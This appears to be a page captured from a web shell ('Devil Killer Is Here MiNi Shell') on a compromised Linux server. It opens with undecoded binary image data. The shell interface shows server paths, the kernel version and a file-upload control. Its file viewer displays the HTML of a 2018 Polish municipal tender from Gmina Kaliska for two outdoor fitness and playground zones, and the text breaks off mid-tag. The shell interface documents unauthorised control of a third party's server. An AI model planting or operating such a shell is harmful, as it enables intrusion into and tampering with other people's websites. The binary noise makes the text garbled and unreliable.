JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180816/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180816/604928-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 604928-N-2018 z dnia 2018-08-16 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Kaliska</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Budowa dwóch Otwartych Stref Aktywności na terenie działki nr 323/18 w miejscowości Cieciorka oraz 338 w miejscowości Piece, gmina Kaliska</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Kaliska</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">19167569800000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Nowowiejska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">2</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">83-260 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Kaliska</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">pomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">585 889 201</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">b.sikora@kaliska.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">585 889 206</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.kaliska.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.kaliska.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.kaliska.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">drogą pocztową lub osobiście</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Gmina Kaliska, ul. Nowowiejska 2, 83-260 Kaliska</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Budowa dwóch Otwartych Stref Aktywności na terenie działki nr 323/18 w miejscowości Cieciorka oraz 338 w miejscowości Piece, gmina Kaliska</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">RR.271.25.2018.I</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Przedmiotem zamówienia jest wykonanie zadania pn.: ,,Budowa dwóch OtwartychStref Aktywności na terenie działki nr 323/18 w miejscowości Cieciorka oraz 338 w miejscowościPiece, gmina Kaliska". Zamówienie obejmuje wykonanie jednej Otwartej Strefy Aktywności wwariancie podstawowym w miejscowości Cieciorka oraz jednej Strefy w wariancie rozszerzonym wmiejscowości Piece. Łącznie planowany jest montaż: 12 szt. urządzeń siłowni zewnętrznej, 3 szt.urządzeń placu zabaw, 9 szt. ławek, 5 szt. koszy na śmieci, 2 szt. tablic informacyjnych, 2 szt.zestawów do gry w szachy oraz 1 stół do ping-ponga, wykonanie ogrodzenia placu zabaw, wykonanietrawników na powierzchni ok. 420 m2,, wykonanie nawierzchni piaszczystej pod plac zabaw opowierzchni około 194,5 m2, wykonanie utwardzenia terenu o powierzchni około 264 m2. 2. Przedsięwzięcie umiejscowione jest w dwóch lokalizacjach: 1) zakres I - Budowa otwartej strefyaktywności na terenie dz. nr 338 w Piecach obręb Kaliska, gmina Kaliska, 2) zakres II - Budowaotwartej strefy aktywności na terenie dz. nr 323/8 w Cieciorce, obręb Kaliska, gmina Kaliska. 3.Zakres I dotyczy: 1) zakup, dostawa i montaż urządzeń siłowni zewnętrznej: - biegacz - 1 szt., -orbitrek - 1 szt., - wyciąg + wyciskanie - 1 szt., - wioślarz - 1 szt., - twister + wahadło - 1 szt., -rowerek - 1 szt. Uwaga: z ofertą należy przedstawić wykaz urządzeń! 2) zakup, dostawa i montażurządzeń zręcznościowego placu zabaw: - zestaw zręcznościowy z mostkiem, - ściankazręcznościowa, - linarium. Uwaga: z ofertą należy przedstawić wykaz urządzeń! 3) zakup, dostawa imontaż urządzeń i wyposażenia strefy relaksu: - stół do szachów - 1 szt., - ławki - 7 szt., - kosze naśmieci - 3 szt., - tablica informacyjna - 1 szt. Uwaga: z ofertą należy przedstawić wykaz urządzeń! 4)Pozostałe roboty: - niwelacja terenu, - wykonanie fundamentów do montażu urządzeń oraznawierzchni z kostki betonowej szarej, - wykonanie nawierzchni piaskowych, - wykonanieogrodzenia zręcznościowego placu zabaw, - wykonanie nowych i uzupełnieni istniejącychnawierzchni trawiastych. 4. Zakres II dotyczy: 1) zakup, dostawa i montaż urządzeń siłownizewnętrznej: - biegacz - 1 szt., - orbitrek - 1 szt., - wyciąg + wyciskanie - 1 szt., - wioślarz - 1 szt.,- twister + wahadło - 1 szt., - rowerek - 1 szt. Uwaga: z ofertą należy przedstawić wykaz urządzeń! 2)zakup, dostawa i montaż urządzeń i wyposażenia strefy relaksu: - stół do szachów - 1 szt., - stół doping-ponga - 1 szt., - ławki - 2 szt., - kosze na śmieci - 2 szt., - tablica informacyjna - 1 szt. Uwaga:z ofertą należy przedstawić wykaz urządzeń! 3) Pozostałe roboty: - niwelacja terenu, - wykonaniefundamentów do montażu urządzeń oraz nawierzchni z kostki betonowej szarej, - wykonanie nowychi uzupełnieni istniejących nawierzchni trawiastych. 5. Szczegółowy opis i zakres przedmiotuzamówienia określają projekty zagospodarowania terenu, obmiary, stanowiące załączniki nr 10-13 doniniejszej SIWZ. 6. Całość prac należy wykonać zgodnie z projektami zagospodarowania terenu dla,,Budowy otwartej strefy aktywności na terenie dz. nr 338 w Piecach" oraz ,,Budowy otwartej strefyaktywności na terenie dz. nr 323/8 w Cieciorce", stanowiące załącznik nr 10 i 11 do niniejszej SIWZ.7. Zastosowane materiały muszą być nowe, wolne od jakichkolwiek wad materiałowych,konstrukcyjnych, czy wykonawczych. 8. Zakres zamówienia obejmuje także obsługę gwarancyjną iserwisową. 9. Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lubpodwykonawcę osób wykonujących czynności w zakresie: wykonywania robót budowlanych naterenie budowy (czynności związane z obsługą ciężkiego sprzętu budowlanego tj. m.in. koparka,ładowarka, koparko - ładowarka, frezarka, rozkładarka mas bitumicznych, czynności związane zukładaniem nawierzchni z kostki betonowej/kamiennej, czynności związane z montażem instalacjielektrycznej, czynności związane za zagospodarowaniem terenu tj. montaż małej architektury). 10.Wykonawca zobowiązany będzie do wykonania inwentaryzacji geodezyjnej powykonawczej - obsługa geodezyjna tj. wytyczenie i inwentaryzacja geodezyjna powykonawcza. 11. Wykonawca zobowiązanyjest dostarczyć Zamawiającemu po zakończeniu robót 2 komplety dokumentacji powykonawczej (wszczególności: inwentaryzacja geodezyjna powykonawcza, kosztorys powykonawczy, atesty i aprobatytechniczne zastosowanych materiałów, dokumenty gwarancyjne). 12. Zamawiający zastrzega sobiekonieczność informowania przez Wykonawcę o przebiegu prac. 13. W okresie trwania robótWykonawca będzie: - utrzymywał teren robót w należytym porządku; - wydzielał strefybezpieczeństwa wokół miejsc objętych etapem realizacji inwestycji, za którymi osoby niepożądane niebędą mogły przebywać; - usuwał w sposób prawidłowy odpady - Wykonawcę uznaje się za wytwórcęodpadów powstałych w trakcie realizacji zadania. Usunięcie odpadów, ich wykorzystanie lubunieszkodliwianie są obowiązkiem Wykonawcy. Zamawiający zastrzega sobie, że z tytułuunieszkodliwiania odpadów nie będzie ponosił żadnych kosztów, w tym z tytułu opłat za gospodarczekorzystanie ze środowiska; - podczas realizacji robót Wykonawca będzie przestrzegał przepisówbezpieczeństwa i higieny pracy; - Wykonawca będzie odpowiadał za ochronę robót oraz za wszelkiemateriały i urządzenia wykorzystywane do realizacji zadania od daty rozpoczęcia robót do daty ichodebrania przez Zamawiającego; - po zakończeniu i wykonywaniu robót i przed końcowym odbioremzamówienia Wykonawca zobowiązany będzie na swój koszt uporządkować teren budowy. 14.Wykonawca zrealizuje przedmiot zamówienia zgodnie z obowiązującymi w tym zakresie przepisamiwynikającymi z ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2017 r., poz. 1332 ze zm.),zaleceniami nadzoru inwestorskiego, obowiązującymi normami państwowymi i branżowymi orazsztuką inżynierską. 15. Zamawiający sugeruje, lecz nie wymaga, aby przed złożeniem oferty każdy zWykonawców ubiegający się o udzielenie niniejszego zamówienia odbył wizję lokalną w celu oceny,na własną odpowiedzialność, koszt i ryzyko, wszystkich czynników koniecznych do przygotowaniarzetelnej oferty, obejmującej wszelkie niezbędne prace przygotowawcze, zasadnicze i towarzyszącezarówno do prowadzenia robót budowlanych - montażowych, jak i przygotowania projektu. Wprzypadku chęci odbycia wizji lokalnej, Wykonawca zobowiązany jest do złożenia pisemnegowniosku o ustalenie jej terminu. 16. Wykonawca jest zobowiązany udzielić Zamawiającemu minimum36 miesięcznej gwarancji na wykonane roboty budowlane licząc od dnia odbioru końcowego robót ipodpisanego (bez uwag) protokołu odbioru, okres rękojmi będzie równy okresowi udzielonej przezWykonawcę gwarancji. 17. Wykonawcy ponoszą wyłączną odpowiedzialność za zbadanie z należytąstarannością SIWZ i za zapoznanie się z każdą ewentualną modyfikacją jej zapisów, wydaną w trakciepostępowania o udzielenie zamówienia oraz za uzyskanie informacji, które będą niezbędne dowłaściwego przygotowania oferty i należytego wykonania robót. Uznaje się, iż złożenie ofertyoznacza, że Wykonawcy zapoznali się ze wszelkimi odpowiednimi ustawami i innymi przepisamiprawnymi obowiązującymi w Rzeczypospolitej Polskiej, które mogą w jakikolwiek sposób wpłynąć lub dotyczyć działań i czynności objętych ofertą i wynikającą z niej Umową. 18. UWAGA: Jeśligdziekolwiek w SIWZ przedmiot zamówienia określony został przez wskazanie znaków towarowychlub pochodzenie urządzeń i materiałów, to Zamawiający dopuszcza możliwość zastosowaniamateriałów i urządzeń równoważnych w stosunku do zaprojektowanych z zachowaniem tych samych(lub wyższych) standardów technicznych, technologicznych i jakościowych. Przez pojęcie urządzeń imateriałów równoważnych należy rozumieć urządzenia i materiały gwarantujące realizację robótzgodnie z wydanym zgłoszeniem zamiaru wykonania robót budowlanych oraz zapewniające uzyskanieparametrów technicznych nie gorszych od zawartych w projekcie budowlanym (i obmiarach).Ewentualne użycie w obmiarach i projekcie budowlanym określeń i nazw własnych ma jedyniecharakter przykładowy i służy określeniu klasy i jakości przeznaczonych do wbudowania materiałów.Wykaz zastosowanych i przyjętych przez Wykonawcę do wyceny materiałów lub urządzeńrównoważnych musi zostać załączony do oferty. Koniecznym jest podanie nazwy producenta,precyzyjnego i jednoznacznego typu urządzenia lub materiału oraz załączenie niezbędnychdokumentów, takich jak: atest PZH, deklaracja zgodności producenta/aprobata techniczna, kartakatalogowa producenta zawierająca wszystkie parametry techniczno-eksploatacyjne ujęte wdokumentacji. Zamawiający nie wyraża zgody, by proponowane w ofercie urządzenia równoważnebyły prototypami. Wymogiem bezwzględnym jest, by były to materiały i urządzenia sprawdzone,pracujące na innych zrealizowanych obiektach (umieszczonych w wykazie wykonanych robót -załącznik nr 12 do SIWZ z zaznaczeniem, że chodzi o te obiekty) przez okres nie krótszy, niż okresgwarancji jaki posiadają urządzenia przyjęte w dokumentacji. Zamawiający zastrzega sobie prawodokonania oględzin i sprawdzenia poprawności działania urządzenia równoważnego pracującego nawskazanym obiekcie. 19. Zamawiający nie przewiduje udzielania zaliczek. 20. Zamawiający żąda byWykonawca wskazał w ofercie części zamówienia, których wykonanie zamierza powierzyćpodwykonawcom wraz z podaniem nazw firm tychże podwykonawców. Jeżeli Wykonawca ma zamiarzlecić wykonanie części przedmiotu zamówienia podwykonawcy, to musi wypełnić i załączyć dooferty załącznik nr 7 do SIWZ. 21. Wykonawcy ponoszą wyłączną odpowiedzialność za zbadanie znależytą starannością SIWZ i za zapoznanie się z każdą ewentualną modyfikacją SIWZ wydaną wtrakcie postępowania o udzielenie zamówienia oraz za uzyskanie informacji, które będą niezbędne dowłaściwego przygotowania oferty i należytego wykonania robót. Uznaje się, iż złożenie ofertyoznacza, że Wykonawcy zapoznali się ze wszelkimi odpowiednimi ustawami i innymi przepisamiprawnymi obowiązującymi w Rzeczypospolitej Polskiej, które mogą w jakikolwiek sposób wpłynąćlub dotyczyć działań i czynności objętych ofertą i wynikającą z niej Umową. 22. Kody CPV:37410000 - 5 Sprzęt sportowy do uprawiania sportów na wolnym powietrzu 45112720 - 8 Roboty wzakresie kształtowania terenów sportowych i rekreacyjnych 45000000 - 7 Roboty budowlane</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45000000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45112720-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>37410000-5</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span 